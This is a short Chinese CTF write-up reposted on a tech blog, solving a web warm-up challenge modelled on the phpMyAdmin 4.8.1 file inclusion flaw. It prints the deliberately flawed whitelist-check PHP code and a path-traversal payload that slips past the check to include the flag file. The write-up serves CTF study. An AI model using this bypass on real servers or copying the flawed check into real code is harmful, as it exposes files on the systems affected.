资讯专栏INFORMATION COLUMN

BCNSCTF writeup

hufeng / 554人阅读

摘要:这个题目原型是的任意文件包含漏洞发现源码不为空是字符串上面定义的方法返回值为真

[toc]

Web warm up

这个题目原型是phpmyadmin4.8.1的任意文件包含漏洞
发现源码

</>复制代码

  1. "source.php","hint"=>"hint.php"];
  2. if (! isset($page) || !is_string($page)) {
  3. echo "you can"t see it";
  4. return false;
  5. }
  6. if (in_array($page, $whitelist)) {
  7. return true;
  8. }
  9. $_page = mb_substr(
  10. $page,
  11. 0,
  12. mb_strpos($page . "?", "?")
  13. );
  14. if (in_array($_page, $whitelist)) {
  15. return true;
  16. }
  17. $_page = urldecode($page);
  18. $_page = mb_substr(
  19. $_page,
  20. 0,
  21. mb_strpos($_page . "?", "?")
  22. );
  23. if (in_array($_page, $whitelist)) {
  24. return true;
  25. }
  26. echo "you can"t see it";
  27. return false;
  28. }
  29. }
  30. if (! empty($_REQUEST["file"]) 不为空
  31. && is_string($_REQUEST["file"]) 是字符串
  32. && emmm::checkFile($_REQUEST["file"]) 上面定义的checkfile方法返回值为真
  33. ) {
  34. include $_REQUEST["file"];
  35. exit;
  36. } else {
  37. echo "
    ";
  38. }
  39. ?>

payloadhint.php?/../../../../../ffffllllaaaagggg

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/31727.html

相关文章

  • WriteUp – 2018年“华为杯”极客出发XMan冬令营线上CTF选拔赛

    摘要:第二题返老还童拿到之后丢进,发现只有,代码,没有。仔细观察发现,以上坐标可以对应坐标系中的一个九宫格。有点脑洞,把九个坐标编好数字,然后按照坐标给出的顺序写数字就是答案。 Mobile 第二题:返老还童(1000pt) 拿到apk之后丢进JEB,发现只有.class,java代码,没有so。整个apk的class文件结构如下: a.a.a com.reverse.daydayup.a ...

    young.li 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<